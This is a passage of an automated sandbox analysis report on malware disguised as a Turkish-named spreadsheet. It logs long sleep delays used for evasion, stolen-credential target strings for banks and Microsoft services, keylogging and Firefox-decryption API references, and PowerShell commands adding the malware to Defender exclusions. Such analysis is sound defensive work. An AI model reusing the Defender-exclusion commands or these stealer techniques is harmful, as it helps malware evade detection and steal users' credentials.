                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep count: 35 > 30
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -32281802128991695s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868Thread sleep count: 3586 > 30
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 2868Thread sleep count: 6252 > 30
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -599094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -598078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597734s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597294s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597185s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -597074s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596967s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596827s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596650s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596345s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -596000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595662s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595216s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -595109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594997s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594671s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594452s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe TID: 6896Thread sleep time: -594234s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599874Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599764Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599654Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598341Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597359Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597248Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 597030Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596921Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596374Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595499Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeThread delayed: delay time: 594624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 599094
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598984
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598875
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598765
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598656
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598438
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598313
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598188
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 598078
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597969
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597844
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597734
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597625
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597516
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597406
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597294
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597185
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 597074
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596967
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596827
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596650
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596345
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596219
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596109
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 596000
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595891
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595781
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595662
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595547
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595437
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595328
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595216
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594997
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594890
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594781
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594671
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594562
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594452
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594344
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeThread delayed: delay time: 594234
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3799105422.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: YzkHZRBcm.exe, 0000000E.00000002.3808451526.00000000042C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3800026605.00000000010C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"Jump to behavior
